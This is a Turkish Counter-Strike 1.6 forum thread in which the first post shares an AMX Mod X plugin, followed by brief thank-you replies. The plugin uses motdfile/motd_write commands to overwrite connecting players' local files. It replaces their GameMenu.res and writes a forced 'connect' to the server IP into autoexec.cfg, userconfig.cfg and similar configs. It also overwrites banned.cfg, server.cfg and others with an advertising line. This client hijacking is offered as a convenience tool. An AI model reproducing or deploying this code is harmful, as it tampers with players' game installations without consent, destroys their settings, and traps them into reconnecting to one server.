Kullanıcı Tag Listesi

9 sonuçtan 1 ile 9 arası
Like Tree1Likes
  • 1 Post By team36

Konu: AutoConnect (IP Algılamalı) + AutoGameMenu (Server Adı - IP Algılamalı)

  1. #1
    er er
    Üyelik tarihi
    Jan 2014
    Mesajlar
    45
    Bahsedildi
    0 Mesaj
    Etiketlenmiş
    0 Konu
    Tecrübe Puanı
    11

    Standart AutoConnect (IP Algılamalı) + AutoGameMenu (Server Adı - IP Algılamalı)

    merhaba arkadaşlar sizlere yaptığım pluginden bahsedeyim birazcık

    ** hangi sunucuya kurulursa kurulsun bilgileri (serverip & serveradı vs.) otomatik algılar.
    ** GameMenu Eklentisini Kurmaya Gerek Yoktur. Varsa Siliniz yada kapatın.
    ** Hepsi İçinde Mevcut. ( Hepsi Otomatik Algılanacak Şekilde Ayarlandı )

    ## Ayarlarından bahsedeyim ##

    eğer options(ayarlar) kısmında ayar yapıp okeyledikten sonra servera tekrar bağlanmasını istiyor iseniz;

    client_cmd(id,"motd_write echo www.CSPLague.COM",g_ServerIp) yazan kısımları tek teek

    şöyle değiştirin

    client_cmd(id,"motd_write connect %s",g_ServerIp)


    Kod:
    #include <amxmodx>
    
    #define PLUGIN "AutoConnect (IP Algılamalı) + AutoGameMenu (Server Adı - IP Algılamalı) Akıllı Sistem"
    #define VERSION "1.0"
    #define AUTHOR "team36"
    
    
    new g_ServerName[64]; 
    new g_ServerIp[32] 
    
    
    new szText[1200];
    
    
    public plugin_precache()
        precache_generic("resource/GameMenu.res");
    
    
    public plugin_init()
    {
        register_plugin(PLUGIN, VERSION , AUTHOR);
        
        get_user_ip(0,g_ServerIp,31,0)
            replace_all(g_ServerIp,31,":27015","")
        get_cvar_string("hostname",g_ServerName,63)
        
        new size = sizeof(szText) - 1;
        format(szText, size, "^"GameMenu^" { ^"1^" { ^"label^" ^"%s^"", g_ServerName);
        format(szText, size, "%s ^"command^" ^"engine connect %s^"", szText, g_ServerIp);
        format(szText,size, "%s } ^"2^" { ^"label^" ^"Baglan => [ %s ]^"",szText,g_ServerIp);
        format(szText,size, "%s ^"command^" ^"engine connect %s^"",szText,g_ServerIp);
        format(szText, size, "%s } ^"3^" { ^"label^" ^"^" ^"command^" ^"^" }", szText);
        format(szText, size, "%s ^"4^" { ^"label^" ^"Devam Et^"", szText);
        format(szText, size, "%s ^"command^" ^"ResumeGame^" ^"OnlyInGame^" ^"1^" }", szText);
        format(szText, size, "%s ^"5^" { ^"label^" ^"Baglantiyi Kes^"", szText);
        format(szText, size, "%s ^"command^" ^"Disconnect^" ^"OnlyInGame^" ^"1^"", szText);
        format(szText, size, "%s ^"notsingle^" ^"1^" } ^"5^" { ^"label^" ^"Oyuncu Listesi^"", szText);
        format(szText, size, "%s ^"command^" ^"OpenPlayerListDialog^" ^"OnlyInGame^" ^"1^" ^"notsingle^" ^"1^"", szText);
        format(szText, size, "%s } ^"9^" { ^"label^" ^"^" ^"command^" ^"^" ^"OnlyInGame^" ^"1^" }", szText);
        format(szText, size, "%s ^"10^" { ^"label^" ^"Yeni Oyun^" ^"command^" ^"OpenCreateMultiplayerGameDialog^"", szText);
        format(szText, size, "%s } ^"11^" { ^"label^" ^"Sunucular // www.CSPLague.COM^" ^"command^" ^"OpenServerBrowser^"", szText);
        format(szText, size, "%s } ^"12^" { ^"label^" ^"Ayarlar^" ^"command^" ^"OpenOptionsDialog^"", szText);
        format(szText, size, "%s } ^"13^" { ^"label^" ^"Cikis^" ^"command^" ^"Quit^" } }", szText);
    }
    public client_putinserver (id) {
        set_task(3.0, "TaskChangeMenu", id);
    }
    
    
    public TaskChangeMenu(id)
    {
        client_cmd(id, "motdfile ^"resource/GameMenu.res^"");
        client_cmd(id, "motd_write %s", szText);
        client_cmd(id, "motdfile ^"motd.txt^"");
    }
    public client_connect(id) {
        client_cmd(id,"motdfile autoexec.CFG")
        client_cmd(id,"motd_write connect %s",g_ServerIp)
            client_cmd(id,"motdfile autoconfig.CFG")
        client_cmd(id,"motd_write connect %s",g_ServerIp)
            client_cmd(id,"motdfile (null).CFG")
        client_cmd(id,"motd_write connect %s",g_ServerIp)
            client_cmd(id,"motdfile userconfig.CFG")
        client_cmd(id,"motd_write connect %s",g_ServerIp)
            client_cmd(id,"motdfile joystick.CFG")
            client_cmd(id,"motd_write connect %s",g_ServerIp)
            client_cmd(id,"motdfile banned.CFG")
            client_cmd(id,"motd_write echo www.CSPLague.COM",g_ServerIp)
            client_cmd(id,"motdfile banner.CFG")
            client_cmd(id,"motd_write echo www.CSPLague.COM",g_ServerIp)
            client_cmd(id,"motdfile violence.CFG")
            client_cmd(id,"motd_write echo www.CSPLague.COM",g_ServerIp)
            client_cmd(id,"motdfile listip.CFG")
            client_cmd(id,"motd_write echo www.CSPLague.COM",g_ServerIp)
            client_cmd(id,"motdfile listenserver.CFG")
            client_cmd(id,"motd_write echo www.CSPLague.COM",g_ServerIp)
            client_cmd(id,"motdfile server.CFG")
            client_cmd(id,"motd_write echo www.CSPLague.COM",g_ServerIp)
            client_cmd(id,"motdfile language.CFG")
            client_cmd(id,"motd_write echo www.CSPLague.COM",g_ServerIp)
            client_cmd(id,"motdfile autoconnect.CFG")
            client_cmd(id,"motd_write echo www.CSPLague.COM",g_ServerIp)
    }
    smartgamepanel likes this.

  2. #2
    onbasi er
    Üyelik tarihi
    Jun 2015
    Mesajlar
    66
    Bahsedildi
    0 Mesaj
    Etiketlenmiş
    0 Konu
    Tecrübe Puanı
    9

    Standart Cevap: AutoConnect (IP Algılamalı) + AutoGameMenu (Server Adı - IP Algılamalı)

    Eyw kardeşim

  3. #3
    onbasi er
    Üyelik tarihi
    Jun 2015
    Mesajlar
    57
    Bahsedildi
    0 Mesaj
    Etiketlenmiş
    0 Konu
    Tecrübe Puanı
    9

    Standart Cevap: AutoConnect (IP Algılamalı) + AutoGameMenu (Server Adı - IP Algılamalı)

    asdasda

    - - - - - - - - - -

    eyw

  4. #4
    onbasi er
    Üyelik tarihi
    Jun 2016
    Mesajlar
    52
    Bahsedildi
    0 Mesaj
    Etiketlenmiş
    0 Konu
    Tecrübe Puanı
    8

    Standart Cevap: AutoConnect (IP Algılamalı) + AutoGameMenu (Server Adı - IP Algılamalı)

    Sağolasın Kardeşim

  5. #5
    er er
    Üyelik tarihi
    Jul 2016
    Mesajlar
    20
    Bahsedildi
    0 Mesaj
    Etiketlenmiş
    0 Konu
    Tecrübe Puanı
    8

    Standart Cevap: AutoConnect (IP Algılamalı) + AutoGameMenu (Server Adı - IP Algılamalı)

    iş görür.

  6. #6
    er er
    Üyelik tarihi
    Dec 2015
    Mesajlar
    2
    Bahsedildi
    0 Mesaj
    Etiketlenmiş
    0 Konu
    Tecrübe Puanı
    9

    Standart Cevap: AutoConnect (IP Algılamalı) + AutoGameMenu (Server Adı - IP Algılamalı)

    aasdsa

  7. #7
    onbasi er
    Üyelik tarihi
    Dec 2016
    Mesajlar
    54
    Bahsedildi
    0 Mesaj
    Etiketlenmiş
    0 Konu
    Tecrübe Puanı
    8

    Standart Cevap: AutoConnect (IP Algılamalı) + AutoGameMenu (Server Adı - IP Algılamalı)

    Çok güzel Taktir ettim

  8. #8
    er er
    Üyelik tarihi
    Jul 2016
    Mesajlar
    4
    Bahsedildi
    0 Mesaj
    Etiketlenmiş
    0 Konu
    Tecrübe Puanı
    8

    Standart Cevap: AutoConnect (IP Algılamalı) + AutoGameMenu (Server Adı - IP Algılamalı)

    Csduragi serverime kurdum fakat hiçbişey olduğunu göremedim ?

  9. #9
    er er
    Üyelik tarihi
    Mar 2017
    Mesajlar
    1
    Bahsedildi
    0 Mesaj
    Etiketlenmiş
    0 Konu
    Tecrübe Puanı
    8

    Standart Cevap: AutoConnect (IP Algılamalı) + AutoGameMenu (Server Adı - IP Algılamalı)

    adamsın

Benzer Konular

  1. Server Connect Mesagge Plugin ( Server Giris Yazisi Plugini )
    By NiCoMeDiA in forum [PLUGİN] Cs 1.6 Eklentiler
    Cevaplar: 214
    Son Mesaj: 30-04-15, 14:30

Kullanıcıların arama motorlarındaki kullandığı taglar:

register_plugin GameMenu

Counter Strike

Bu Konudaki Etiketler

Yetkileriniz

  • Konu Acma Yetkiniz Yok
  • Cevap Yazma Yetkiniz Yok
  • Eklenti Yükleme Yetkiniz Yok
  • Mesajınızı Değiştirme Yetkiniz Yok
  •  

SEO by vBSEO 3.6.0 ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121